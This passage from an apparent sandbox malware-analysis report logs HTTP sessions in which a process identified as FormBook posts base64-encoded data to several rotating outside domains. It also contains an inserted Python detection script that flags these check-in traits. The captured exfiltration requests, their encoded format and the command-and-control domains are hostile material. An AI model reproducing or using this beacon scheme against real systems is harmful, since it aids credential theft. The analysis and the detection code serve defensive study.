Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.promasterev.shop
Origin: http://www.promasterev.shop
Cache-Control: max-age=0
Content-Length: 1229
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.promasterev.shop/abrg/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Data Raw: 74 70 54 64 3d 4c 6c 6f 70 6c 55 78 78 4b 78 65 58 38 48 71 55 76 54 74 55 6c 4b 6c 38 58 48 44 52 51 77 62 48 6e 33 4a 43 33 2b 39 4f 47 75 79 32 6f 51 79 4b 45 6e 79 45 77 70 6d 72 54 61 39 6d 35 61 79 7a 42 65 61 46 2f 64 43 42 69 51 42 71 55 75 4b 6b 2b 76 69 4e 4a 70 6a 6e 6f 4a 74 4e 48 63 50 37 64 4b 67 58 78 47 52 4f 48 4d 6b 43 6d 71 41 47 6c 53 47 39 62 44 34 4d 46 4c 65 76 61 72 65 51 63 57 6c 42 72 55 62 6f 69 53 30 48 4a 42 59 78 50 4e 52 6f 4d 38 36 51 63 70 32 6f 46 46 2b 4a 72 6e 77 45 55 30 63 63 4d 4a 5a 6c 48 78 51 35 47 4f 6b 49 6d 72 31 58 51 50 35 6c 46 31 77 32 59 6c 46 63 5a 6d 39 6f 39 69 7a 41 69 4f 72 38 76 75 33 50 63 73 75 37 45 5a 2b 54 79 55 58 73 4b 66 2b 70 6b 78 76 72 44 63 65 78 61 56 52 61 6c 54 58 6d 68 46 58 67 48 30 74 6f 35 6c 70 6c 78 47 6a 61 35 2b 7a 4d 52 4b 37 30 64 69 4d 51 70 31 49 74 30 4d 68 69 46 6c 45 6d 64 55 75 72 56 72 32 6d 53 68 65 2b 75 4f 7a 78 47 66 44 37 37 4c 72 65 6c 57 2b 4e 79 46 62 31 73 42 31 75 31 33 58 44 64 47 52 76 50 77 76 6e 73 [TRUNCATED]
Data Ascii: tpTd=... [TRUNCATED]


Session ID: 8 | Source: 192.168.2.9:60657 | Destination: 3.33.130.190:80 | PID: 1432 | Process: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:34:14.109869957 CEST | 477 | OUT | GET /abrg/?WX=rnWllP5PLlhLLtj&tpTd=GnAJmiRPPiyH2TmfuBVnsZoXdGf0FUPFySgQhtVOM4GwnDq9Dnvh9ePCWYtJxLLAU+yG0d2c2V85YMiF3u+CH4Whw+Z8K8Lme5ABmnpnJdsWz6g8ww== HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.promasterev.shop
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Oct 8, 2024 15:34:14.561187983 CEST | 395 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Tue, 08 Oct 2024 13:34:14 GMT
Content-Type: text/html
Content-Length: 255
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 57 58 3d 72 6e 57 6c 6c 50 35 50 4c 6c 68 4c 4c 74 6a 26 74 70 54 64 3d 47 6e 41 4a 6d 69 52 50 50 69 79 48 32 54 6d 66 75 42 56 6e 73 5a 6f 58 64 47 66 30 46 55 50 46 79 53 67 51 68 74 56 4f 4d 34 47 77 6e 44 71 39 44 6e 76 68 39 65 50 43 57 59 74 4a 78 4c 4c 41 55 2b 79 47 30 64 32 63 32 56 38 35 59 4d 69 46 33 75 2b 43 48 34 57 68 77 2b 5a 38 4b 38 4c 6d 65 35 41 42 6d 6e 70 6e 4a 64 73 57 7a 36 67 38 77 77 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?WX=rnWllP5PLlhLLtj&tpTd=GnAJmiRPPiyH2TmfuBVnsZoXdGf0FUPFySgQhtVOM4GwnDq9Dnvh9ePCWYtJxLLAU+yG0d2c2V85YMiF3u+CH4Whw+Z8K8Lme5ABmnpnJdsWz6g8ww=="}</script></head></html>


Session ID: 9 | Source: 192.168.2.9:60679 | Destination: 3.33.130.190:80 | PID: 1432 | Process: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:34:19.625890017 CEST | 761 | OUT | POST /itly/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.childlesscatlady.today
Origin: http://www.childlesscatlady.today
Cache-Control: max-age=0
Content-Length: 193
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.childlesscatlady.today/itly/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Data Raw: 74 70 54 64 3d 67 75 36 68 65 37 78 4b 79 2f 6f 4c 66 64 72 32 52 72 59 46 6c 44 50 70 4e 79 4d 42 65 72 46 71 78 4a 37 63 4d 54 73 71 58 65 7a 61 2b 6c 41 41 46 6f 68 67 4b 45 59 63 58 56 2f 61 50 33 4b 51 50 39 68 6d 33 68 6b 31 61 64 64 4f 30 50 68 6e 52 31 59 4b 57 57 39 52 57 34 36 46 32 48 46 31 38 76 53 62 64 72 37 56 67 2b 42 43 4f 6c 73 69 74 76 4c 63 2b 59 48 41 4e 4b 78 41 34 74 31 48 6f 56 6c 78 59 36 35 32 73 6d 53 5a 4c 45 51 76 69 53 42 6e 67 70 36 67 42 65 4e 66 6e 61 75 4b 44 72 68 67 6a 69 2f 38 6c 30 46 58 42 44 56 63 32 79 70 4c 6d 58 51 44 46 46 4a 64
Data Ascii: tpTd=gu6he7xKy/oLfdr2RrYFlDPpNyMBerFqxJ7cMTsqXeza+lAAFohgKEYcXV/aP3KQP9hm3hk1addO0PhnR1YKWW9RW46F2HF18vSbdr7Vg+BCOlsitvLc+YHANKxA4t1HoVlxY652smSZLEQviSBngp6gBeNfnauKDrhgji/8l0FXBDVc2ypLmXQDFFJd


Session ID: 10 | Source: 192.168.2.9:60698 | Destination: 3.33.130.190:80 | PID: 1432 | Process: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:34:22.176304102 CEST | 785 | OUT | POST /itly/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.childlesscatlady.today
Origin: http://www.childlesscatlady.today
Cache-Control: max-age=0
Content-Length: 217
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.childlesscatlady.today/itly/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Data Raw: 74 70 54 64 3d 67 75 36 68 65 37 78 4b 79 2f 6f 4c 66 38 62 32 51 4d 6b 46 6e 6a 50 75 44 53 4d 42 58 4c 46 75 78 4a 48 63 4d 52 41 36 58 73 6e 61 77 67 38 41 45 72 35 67 4c 45 59 63 59 31 2f 62 46 58 4c 53 50 39 64 55 33 6a 77 31 61 64 5a 4f 30 4c 6c 6e 52 47 77 4a 45 57 39 54 44 49 36 48 79 48 46 31 38 76 53 62 64 6f 47 36 67 2b 70 43 4f 56 38 69 69 75 4c 66 68 6f 48 50 46 71 78 41 75 74 31 44 6f 56 6c 66 59 2b 35 49 73 6a 57 5a 4c 46 41 76 69 44 42 67 72 70 36 6d 63 75 4d 52 68 37 66 61 4b 35 78 66 69 53 6e 61 7a 58 52 38 43 69 31 43 6e 41 67 51 7a 41 51 6b 43 69 41 31 73 38 63 42 56 31 78 66 78 30 65 4c 36 56 64 78 34 4b 56 6e 4a 51 3d 3d
Data Ascii: tpTd=gu6he7xKy/oLf8b2QMkFnjPuDSMBXLFuxJHcMRA6Xsnawg8AEr5gLEYcY1/bFXLSP9dU3jw1adZO0LlnRGwJEW9TDI6HyHF18vSbdoG6g+pCOV8iiuLfhoHPFqxAut1DoVlfY+5IsjWZLFAviDBgrp6mcuMRh7faK5xfiSnazXR8Ci1CnAgQzAQkCiA1s8cBV1xfx0eL6Vdx4KVnJQ==


Session ID: 11 | Source: 192.168.2.9:60715 | Destination: 3.33.130.190:80 | PID: 1432 | Process: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:34:24.727288008 CEST | 1798 | OUT | POST /itly/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.childlesscatlady.today
Origin: http://www.childlesscatlady.today
Cache-Control: max-age=0
Content-Length: 1229
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.childlesscatlady.today/itly/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Data Raw: 74 70 54 64 3d 67 75 36 68 65 37 78 4b 79 2f 6f 4c 66 38 62 32 51 4d 6b 46 6e 6a 50 75 44 53 4d 42 58 4c 46 75 78 4a 48 63 4d 52 41 36 58 73 2f 61 77 53 6b 41 46 4b 35 67 49 45 59 63 56 56 2f 65 46 58 4c 54 50 35 4a 51 33 6a 74 43 61 66 52 4f 32 75 78 6e 58 33 77 4a 65 47 39 54 63 59 36 61 32 48 46 67 38 76 69 68 64 6f 57 36 67 2b 70 43 4f 54 34 69 72 66 4c 66 79 34 48 41 4e 4b 78 32 34 74 31 6e 6f 56 74 70 59 2b 74 59 74 58 69 5a 4c 6b 77 76 6b 31 31 67 30 5a 36 6b 64 75 4e 4d 68 37 53 41 4b 35 74 35 69 53 54 67 7a 58 70 38 53 31 46 66 6a 79 78 47 68 67 51 41 43 56 6b 54 6f 62 49 39 51 58 59 57 76 6c 2b 78 74 77 35 68 35 4f 51 30 65 50 69 5a 48 79 62 72 67 53 62 38 2f 78 69 35 70 5a 33 72 44 58 48 56 6e 37 6f 4a 58 73 36 54 59 70 48 71 52 61 50 65 44 56 37 31 58 68 55 35 4f 66 2f 42 42 4d 35 73 30 61 65 72 31 47 5a 70 79 5a 53 46 69 76 61 43 6e 4d 64 6e 2f 37 74 42 33 53 78 61 77 46 75 51 4e 61 62 41 38 59 78 41 38 75 48 6a 77 66 35 4f 66 66 56 36 4d 57 4f 34 48 59 4c 65 44 34 31 43 79 73 44 43 64 [TRUNCATED]
Data Ascii: tpTd=... [TRUNCATED]


Session ID: 12 | Source: 192.168.2.9:60728 | Destination: 3.33.130.190:80 | PID: 1432 | Process: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:34:27.265856981 CEST | 483 | OUT | GET /itly/?tpTd=tsSBdLA6gv84Y8GcYug/jDCyCw8YLYxClZSiOA0GXKnW8CsuEbQ9YFwfaGPSJlWcPZlV2TdpOPQww8tdSTouVEB2Caqu0WVs/8KUUJONnONwfAEA0g==&WX=rnWllP5PLlhLLtj HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.childlesscatlady.today
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Oct 8, 2024 15:34:28.650372028 CEST | 395 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Tue, 08 Oct 2024 13:34:28 GMT
Content-Type: text/html
Content-Length: 255
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 74 70 54 64 3d 74 73 53 42 64 4c 41 36 67 76 38 34 59 38 47 63 59 75 67 2f 6a 44 43 79 43 77 38 59 4c 59 78 43 6c 5a 53 69 4f 41 30 47 58 4b 6e 57 38 43 73 75 45 62 51 39 59 46 77 66 61 47 50 53 4a 6c 57 63 50 5a 6c 56 32 54 64 70 4f 50 51 77 77 38 74 64 53 54 6f 75 56 45 42 32 43 61 71 75 30 57 56 73 2f 38 4b 55 55 4a 4f 4e 6e 4f 4e 77 66 41 45 41 30 67 3d 3d 26 57 58 3d 72 6e 57 6c 6c 50 35 50 4c 6c 68 4c 4c 74 6a 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?tpTd=tsSBdLA6gv84Y8GcYug/jDCyCw8YLYxClZSiOA0GXKnW8CsuEbQ9YFwfaGPSJlWcPZlV2TdpOPQww8tdSTouVEB2Caqu0WVs/8KUUJONnONwfAEA0g==&WX=rnWllP5PLlhLLtj"}</script></head></html>
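
The sessions above all come from PID 1432 and share one shape: a POST to a single short directory (/abrg/, /itly/) whose body is one form field of base64 text, a GET that carries the same field plus a short token in the query string, the same hard-coded Chrome/40.0.2214.38 User-Agent and "Connection: close" on every request, a 255-byte 200 OK that only redirects to /lander, and a rotation through unrelated domains within about 25 seconds. The Python below is an added example for detection engineering, not part of the Joe Sandbox report and not FormBook code: it parses raw requests and flags those traits. The two sample requests are copied from sessions 9 and 8 above (headers verbatim), the benign request and the per-PID host list are constructed from the session headers, and the thresholds (32-character minimum for a base64 blob, 3 to 6 character directory names) are assumptions chosen to fit this capture.

```python
"""Added example: heuristic detection of the FormBook check-in pattern
visible in the HTTP sessions above. Not part of the Joe Sandbox report."""
import re
from collections import defaultdict
from dataclasses import dataclass
from urllib.parse import urlsplit

# Every request in the capture above carries this exact, years-old User-Agent.
FORMBOOK_UA = ("Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 "
               "(KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36")
# One short directory and nothing else: /abrg/, /itly/, /7un9/ in the capture
# (the 3..6 length bound is an assumption fitted to this sample).
PATH_RE = re.compile(r"^/[a-z0-9]{3,6}/$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


@dataclass
class HttpRequest:
    method: str
    target: str
    headers: dict
    body: str


def parse_request(raw: str) -> HttpRequest:
    """Split one raw HTTP/1.x request into start line, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    start, *header_lines = head.split("\r\n")
    method, target, _version = start.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, target, headers, body)


def split_form(data: str) -> dict:
    """Split name=value pairs WITHOUT percent/plus decoding: the malware sends
    raw '+' and '/' inside its base64, and urllib.parse.parse_qs would turn
    every '+' into a space and break the alphabet check below."""
    pairs = (item.partition("=") for item in data.split("&") if item)
    return {name: value for name, _, value in pairs}


def looks_like_b64_blob(value: str, min_len: int = 32) -> bool:
    """Base64 alphabet only, length a multiple of four, and long enough to be
    an encrypted payload rather than a short token such as the WX value."""
    return len(value) >= min_len and len(value) % 4 == 0 and bool(B64_RE.match(value))


def formbook_traits(req: HttpRequest) -> list:
    """Return the FormBook check-in traits a single request exhibits."""
    traits = []
    if req.headers.get("user-agent") == FORMBOOK_UA:
        traits.append("static Chrome/40 user-agent")
    parts = urlsplit(req.target)
    if PATH_RE.match(parts.path):
        traits.append("short single-directory path")
    if req.method == "POST":
        form = split_form(req.body)
        if len(form) == 1 and all(looks_like_b64_blob(v) for v in form.values()):
            traits.append("single base64 form field")
    elif req.method == "GET":
        query = split_form(parts.query)
        if len(query) == 2 and any(looks_like_b64_blob(v) for v in query.values()):
            traits.append("two-parameter query with base64 blob")
    if req.headers.get("connection", "").lower() == "close":
        traits.append("connection: close")
    return traits


def hosts_per_pid(beacons) -> dict:
    """Group (pid, seconds, host) observations: one process cycling through
    unrelated domains within seconds is the other half of the pattern."""
    seen = defaultdict(set)
    for pid, _ts, host in beacons:
        seen[pid].add(host)
    return dict(seen)


# Requests copied from sessions 9 and 8 above; the benign one is constructed.
SAMPLE_POST = (
    "POST /itly/ HTTP/1.1\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\r\n"
    "Accept-Encoding: gzip, deflate, br\r\n"
    "Accept-Language: en-US,en;q=0.9\r\n"
    "Host: www.childlesscatlady.today\r\n"
    "Origin: http://www.childlesscatlady.today\r\n"
    "Cache-Control: max-age=0\r\n"
    "Content-Length: 193\r\n"
    "Connection: close\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Referer: http://www.childlesscatlady.today/itly/\r\n"
    f"User-Agent: {FORMBOOK_UA}\r\n"
    "\r\n"
    "tpTd=gu6he7xKy/oLfdr2RrYFlDPpNyMBerFqxJ7cMTsqXeza+lAAFohgKEYcXV/aP3KQP9hm3hk1addO0PhnR1YKWW9RW46F2HF18vSbdr7Vg+BCOlsitvLc+YHANKxA4t1HoVlxY652smSZLEQviSBngp6gBeNfnauKDrhgji/8l0FXBDVc2ypLmXQDFFJd"
)
SAMPLE_GET = (
    "GET /abrg/?WX=rnWllP5PLlhLLtj&tpTd=GnAJmiRPPiyH2TmfuBVnsZoXdGf0FUPFySgQhtVOM4GwnDq9Dnvh9ePCWYtJxLLAU+yG0d2c2V85YMiF3u+CH4Whw+Z8K8Lme5ABmnpnJdsWz6g8ww== HTTP/1.1\r\n"
    "Host: www.promasterev.shop\r\n"
    "Connection: close\r\n"
    f"User-Agent: {FORMBOOK_UA}\r\n"
    "\r\n"
)
BENIGN_GET = (
    "GET /index.html HTTP/1.1\r\nHost: example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/130.0\r\n\r\n"
)
# (pid, seconds past 15:34:00, host) for PID 1432, from sessions 7 to 13 above.
SAMPLE_BEACONS = [
    (1432, 11, "www.promasterev.shop"), (1432, 14, "www.promasterev.shop"),
    (1432, 19, "www.childlesscatlady.today"), (1432, 22, "www.childlesscatlady.today"),
    (1432, 24, "www.childlesscatlady.today"), (1432, 27, "www.childlesscatlady.today"),
    (1432, 34, "www.animekuid.xyz"),
]

if __name__ == "__main__":
    for raw in (SAMPLE_POST, SAMPLE_GET, BENIGN_GET):
        req = parse_request(raw)
        print(req.method, req.headers["host"], formbook_traits(req))
    print(hosts_per_pid(SAMPLE_BEACONS))
```

In production the request text would come from a proxy log or a pcap rather than string literals, and a single trait is weak on its own: the path and the "Connection: close" header occur in plenty of legitimate traffic. What makes the capture above convincing is the combination, the static User-Agent plus one-field base64 bodies plus one process hitting three unrelated domains inside half a minute, and the detection should be scored that way rather than alerting on any one match.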


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.9 | 60775 | 203.175.9.128 | 80 | 1432 | C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:34:34.490788937 CEST | 734 | OUT | POST /7un9/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.animekuid.xyz
Origin: http://www.animekuid.xyz
Cache-Control: max-age=0
Content-Length: 193
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.animekuid.xyz/7un9/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Data Ascii: tpTd=1VmQjdVity323nBkgIVZ+eK9hKRzY14poILkvxjCWwal8xqhFBfnXzwCGXDVRWHl/0IrzruUIX32vbfiRDALlJ5XTCVO4isA2xmHBWG4I8EFe5yqc/1KUoy9Kn1n6E8+ggrA37rTO0c5laPRV5PlJ9r8nMAURgd4lr2f5L/mG3HQtGL1EhuQp2H5dUfK


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.9 | 60788 | 203.175.9.128 | 80 | 1432 | C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:34:37.040915012 CEST | 758 | OUT | POST /7un9/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.animekuid.xyz
Origin: http://www.animekuid.xyz
Cache-Control: max-age=0
Content-Length: 217
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.animekuid.xyz/7un9/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Data Ascii: tpTd=1VmQjdVity322Hxkmr9ZvuK+/aRzPl4toIHkv0DoWk2l8QahECHnHjwCeHDQf2Hq/0Edzp6UIWX2vbviRwoKq55VGyVM3CsA2xmHBWTfI8MFeICqT6ZFXoy+dX1n+E8AggqV36H9O3k5leHRWsjicNrAjMBUC1gHjoiBwL3wRRXznHrrVTnL8hHeazWidryjsIRcEoqc6FHZMaLBYg==
Oct 8, 2024 15:34:38.444736958 CEST | 1236 | IN | HTTP/1.1 404 Not Found
Date: Tue, 08 Oct 2024 13:34:37 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <https://animekuid.xyz/wp-json/>; rel="https://api.w.org/"
Upgrade: h2,h2c
Connection: Upgrade, close
Vary: Accept-Encoding
Content-Encoding: br
Content-Length: 9101
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.9 | 60807 | 203.175.9.128 | 80 | 1432 | C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:34:39.583482981 CEST | 1771 | OUT | POST /7un9/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.animekuid.xyz
Origin: http://www.animekuid.xyz
Cache-Control: max-age=0
Content-Length: 1229
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.animekuid.xyz/7un9/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Data Ascii: tpTd=[TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.9 | 60821 | 203.175.9.128 | 80 | 1432 | C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:34:42.125914097 CEST | 474 | OUT | GET /7un9/?tpTd=4XOwgplivDvk/EZOubh+oM7E4qBWP2ACvZmroFPOKBmtqB+PCSuAHgoGD1T4VUWf5wIO7JPBcjeVh4zPUWd0ua1JHgAe3g4A1TGkBV6DNuNtOYfRKw==&WX=rnWllP5PLlhLLtj HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.animekuid.xyz
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Oct 8, 2024 15:34:43.493650913 CEST | 521 | IN | HTTP/1.1 301 Moved Permanently
Date: Tue, 08 Oct 2024 13:34:42 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Redirect-By: WordPress
Upgrade: h2,h2c
Connection: Upgrade, close
Location: http://animekuid.xyz/7un9/?tpTd=4XOwgplivDvk/EZOubh+oM7E4qBWP2ACvZmroFPOKBmtqB+PCSuAHgoGD1T4VUWf5wIO7JPBcjeVh4zPUWd0ua1JHgAe3g4A1TGkBV6DNuNtOYfRKw==&WX=rnWllP5PLlhLLtj
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Oct 8, 2024 15:34:43.504765987 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.9 | 60832 | 3.33.130.190 | 80 | 1432 | C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:34:48.552954912 CEST | 740 | OUT | POST /szy7/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.doggieradio.net
Origin: http://www.doggieradio.net
Cache-Control: max-age=0
Content-Length: 193
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.doggieradio.net/szy7/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Data Ascii: tpTd=H+5bRSq0NrhhpzOyUx/oEguvy0uA8FBco+wmJSAtOGZqnddygm8ATLjn+9LFVbvdG9zvp2FbZnWY9vLDJgwsnBLu1ObG2Zt5ou/eUvKdIjgt6ZDIf8hmm/jU34IuLewjD4Db8mvrvLvZrIXJnCbpsU1okyWLX6aNwzmffMwXOWXQyUmVFDXwtbD0tcbB


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.9 | 60833 | 3.33.130.190 | 80 | 1432 | C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:34:51.098999977 CEST | 764 | OUT | POST /szy7/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.doggieradio.net
Origin: http://www.doggieradio.net
Cache-Control: max-age=0
Content-Length: 217
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.doggieradio.net/szy7/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Data Ascii: tpTd=H+5bRSq0NrhhoTeyXQ/oUwusr0uA2lBQo+8mJT09OzJqn8tyhigAabjn1dLcIruTG9/Rpz9bZnCY9uXDOXMroxLs4ubEyZt5ou/eUs23IlItm5TIZdhll/jby4IuaOwvD4D18iu8vIXZrMTJgXnulU1uqSX1Y/nhvRmCSfQwYGDG8VGLUxer4MDTq7SpG2yYrO/++rpZSH5iLRTIZg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.9 | 60834 | 3.33.130.190 | 80 | 1432 | C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:34:53.646997929 CEST | 1777 | OUT | POST /szy7/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.doggieradio.net
Origin: http://www.doggieradio.net
Cache-Control: max-age=0
Content-Length: 1229
Connection: close
